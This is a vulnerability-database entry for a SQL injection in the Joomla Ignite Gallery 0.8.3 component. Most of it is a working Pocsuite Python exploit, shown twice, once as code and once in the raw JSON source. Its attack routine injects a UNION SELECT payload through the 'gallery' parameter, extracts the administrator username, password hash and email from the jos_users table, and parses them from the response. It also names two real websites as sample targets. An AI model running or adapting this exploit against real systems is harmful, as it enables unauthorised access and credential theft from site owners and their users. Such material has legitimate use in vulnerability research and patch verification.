Search...

Joomla Component Ignite Gallery 0.8.3 - SQL Injection Vulnerability

2014-07-01T00:00:00

ID SSV:65822
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import re

class TestPOC(POCBase):
    vulID = '65822'  # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2009-02-19'
    createDate = '2016-01-20'
    updateDate = '2016-01-20'
    references = ['http://www.sebug.net/vuldb/ssvid-65822']
    name = 'Joomla Component Ignite Gallery 0.8.3 - SQL Injection Vulnerability'
    appPowerLink = 'http://www.joomla.org'
    appName = 'Joomla Component Ignite Gallery'
    appVersion = '0.8.3'
    vulType = 'SQL Injection'
    desc = '''
        Ignite Gallery (com_ignitegallery)组件0.8.0版本至0.8.3版本中存在SQL注入漏洞，
        远程攻击者可以借助对index.php的一个图像操作中的gallery参数，执行任意SQL指令。
    '''
    samples = ['http://www.crnm.org','http://www.bike-and-run.com']

    def _attack(self):
        #利用SQL注入读取joomla管理员信息
        result = {}
        #访问的地址
        exploit='/index.php?option=com_ignitegallery&task=view&gallery='
        #利用Union方式读取信息
        payload="-1 union select 1,2,concat(0x247e7e7e24,username,0x2a2a2a,"\
        "password,0x2a2a2a,email,0x247e7e7e24),4,5,6,7,8,9,10 from jos_users limit 0,1--"
        #构造漏洞利用连接
        vulurl=self.url+exploit+payload
        #自定义的HTTP头
        httphead = {
          'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
          'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
          'Connection':'keep-alive'
        }
        #提取信息的正则表达式
        parttern='\$~~~\$(.*)\*\*\*(.*)\*\*\*(.*)\$~~~\$'
        #发送请求
        resp=req.get(url=vulurl,headers=httphead,timeout=50)
        #检查是否含有特征字符串
        if '$~~~$' in resp.content:
            #提取信息
            match=re.search(parttern,resp.content,re.M|re.I)
            if match:
                #漏洞利用成功
                result['AdminInfo']={}
                #用户名
                result['AdminInfo']['Username']=match.group(1)
                #密码
                result['AdminInfo']['Password']=match.group(2)
                #邮箱
                result['AdminInfo']['Email']=match.group(3)
        return self.parse_output(result)

    def _verify(self):
        #通过计算md5(3.1415)的值，来验证SQL注入
        result = {}
        #访问的地址
        exploit='/index.php?option=com_ignitegallery&task=view&gallery='
        #利用union的方式（计算md5(3.1415)）
        payload="-1 union select 1,2,md5(3.1415),4,5,6,7,8,9,10--"
        #构造漏洞利用连接
        vulurl=self.url+exploit+payload
        #自定义的HTTP头
        httphead = {
          'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
          'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
          'Connection':'keep-alive'
        }
        #发送请求
        resp=req.get(url=vulurl,headers=httphead,timeout=50)
        #检查是否含有特征字符串(md5(3.1415)=63e1f04640e83605c1d177544a5a0488)
        if '63e1f04640e83605c1d177544a5a0488' in resp.content:
            #漏洞验证成功
            result['VerifyInfo']={}
            result['VerifyInfo']['URL'] = self.url+exploit
            result['VerifyInfo']['Payload'] = payload
        return self.parse_output(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)

JSON Vulners Source

Initial Source

{"href": "https://www.seebug.org/vuldb/ssvid-65822", "status": "cve,poc", "history": [], "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "Joomla Component Ignite Gallery 0.8.3 - SQL Injection Vulnerability", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-65822", "cvelist": [], "description": "No description provided by source.", "viewCount": 3, "published": "2014-07-01T00:00:00", "sourceData": "\n #!/usr/bin/env python\r\n# coding: utf-8\r\nfrom pocsuite.net import req\r\nfrom pocsuite.poc import POCBase, Output\r\nfrom pocsuite.utils import register\r\nimport re\r\n\r\nclass TestPOC(POCBase):\r\n vulID = '65822' # ssvid\r\n version = '1.0'\r\n author = ['kikay']\r\n vulDate = '2009-02-19'\r\n createDate = '2016-01-20'\r\n updateDate = '2016-01-20'\r\n references = ['http://www.sebug.net/vuldb/ssvid-65822']\r\n name = 'Joomla Component Ignite Gallery 0.8.3 - SQL Injection Vulnerability'\r\n appPowerLink = 'http://www.joomla.org'\r\n appName = 'Joomla Component Ignite Gallery'\r\n appVersion = '0.8.3'\r\n vulType = 'SQL Injection'\r\n desc = '''\r\n Ignite Gallery (com_ignitegallery)\u7ec4\u4ef60.8.0\u7248\u672c\u81f30.8.3\u7248\u672c\u4e2d\u5b58\u5728SQL\u6ce8\u5165\u6f0f\u6d1e\uff0c\r\n \u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u501f\u52a9\u5bf9index.php\u7684\u4e00\u4e2a\u56fe\u50cf\u64cd\u4f5c\u4e2d\u7684gallery\u53c2\u6570\uff0c\u6267\u884c\u4efb\u610fSQL\u6307\u4ee4\u3002\r\n '''\r\n samples = ['http://www.crnm.org','http://www.bike-and-run.com']\r\n\r\n def _attack(self):\r\n #\u5229\u7528SQL\u6ce8\u5165\u8bfb\u53d6joomla\u7ba1\u7406\u5458\u4fe1\u606f\r\n result = {}\r\n #\u8bbf\u95ee\u7684\u5730\u5740\r\n exploit='/index.php?option=com_ignitegallery&task=view&gallery='\r\n #\u5229\u7528Union\u65b9\u5f0f\u8bfb\u53d6\u4fe1\u606f\r\n payload=\"-1 union select 1,2,concat(0x247e7e7e24,username,0x2a2a2a,\"\\\r\n \"password,0x2a2a2a,email,0x247e7e7e24),4,5,6,7,8,9,10 from jos_users limit 0,1--\"\r\n #\u6784\u9020\u6f0f\u6d1e\u5229\u7528\u8fde\u63a5\r\n vulurl=self.url+exploit+payload\r\n #\u81ea\u5b9a\u4e49\u7684HTTP\u5934\r\n httphead = {\r\n 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',\r\n 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\r\n 'Connection':'keep-alive'\r\n }\r\n #\u63d0\u53d6\u4fe1\u606f\u7684\u6b63\u5219\u8868\u8fbe\u5f0f\r\n parttern='\\$~~~\\$(.*)\\*\\*\\*(.*)\\*\\*\\*(.*)\\$~~~\\$'\r\n #\u53d1\u9001\u8bf7\u6c42\r\n resp=req.get(url=vulurl,headers=httphead,timeout=50)\r\n #\u68c0\u67e5\u662f\u5426\u542b\u6709\u7279\u5f81\u5b57\u7b26\u4e32\r\n if '$~~~$' in resp.content:\r\n #\u63d0\u53d6\u4fe1\u606f\r\n match=re.search(parttern,resp.content,re.M|re.I)\r\n if match:\r\n #\u6f0f\u6d1e\u5229\u7528\u6210\u529f\r\n result['AdminInfo']={}\r\n #\u7528\u6237\u540d\r\n result['AdminInfo']['Username']=match.group(1)\r\n #\u5bc6\u7801\r\n result['AdminInfo']['Password']=match.group(2)\r\n #\u90ae\u7bb1\r\n result['AdminInfo']['Email']=match.group(3)\r\n return self.parse_output(result)\r\n\r\n def _verify(self):\r\n #\u901a\u8fc7\u8ba1\u7b97md5(3.1415)\u7684\u503c\uff0c\u6765\u9a8c\u8bc1SQL\u6ce8\u5165\r\n result = {}\r\n #\u8bbf\u95ee\u7684\u5730\u5740\r\n exploit='/index.php?option=com_ignitegallery&task=view&gallery='\r\n #\u5229\u7528union\u7684\u65b9\u5f0f\uff08\u8ba1\u7b97md5(3.1415)\uff09\r\n payload=\"-1 union select 1,2,md5(3.1415),4,5,6,7,8,9,10--\"\r\n #\u6784\u9020\u6f0f\u6d1e\u5229\u7528\u8fde\u63a5\r\n vulurl=self.url+exploit+payload\r\n #\u81ea\u5b9a\u4e49\u7684HTTP\u5934\r\n httphead = {\r\n 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',\r\n 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\r\n 'Connection':'keep-alive'\r\n }\r\n #\u53d1\u9001\u8bf7\u6c42\r\n resp=req.get(url=vulurl,headers=httphead,timeout=50)\r\n #\u68c0\u67e5\u662f\u5426\u542b\u6709\u7279\u5f81\u5b57\u7b26\u4e32(md5(3.1415)=63e1f04640e83605c1d177544a5a0488)\r\n if '63e1f04640e83605c1d177544a5a0488' in resp.content:\r\n #\u6f0f\u6d1e\u9a8c\u8bc1\u6210\u529f\r\n result['VerifyInfo']={}\r\n result['VerifyInfo']['URL'] = self.url+exploit\r\n result['VerifyInfo']['Payload'] = payload\r\n return self.parse_output(result)\r\n\r\n def parse_output(self, result):\r\n #parse output\r\n output = Output(self)\r\n if result:\r\n output.success(result)\r\n else:\r\n output.fail('Internet nothing returned')\r\n return output\r\n\r\n\r\nregister(TestPOC)\n ", "id": "SSV:65822", "enchantments_done": [], "_object_type": "robots.models.seebug.SeebugBulletin", "type": "seebug", "lastseen": "2017-11-19T13:45:54", "reporter": "Root", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2017-11-19T13:45:54"}, "vulnersScore": 5.0}, "objectVersion": "1.4", "references": []}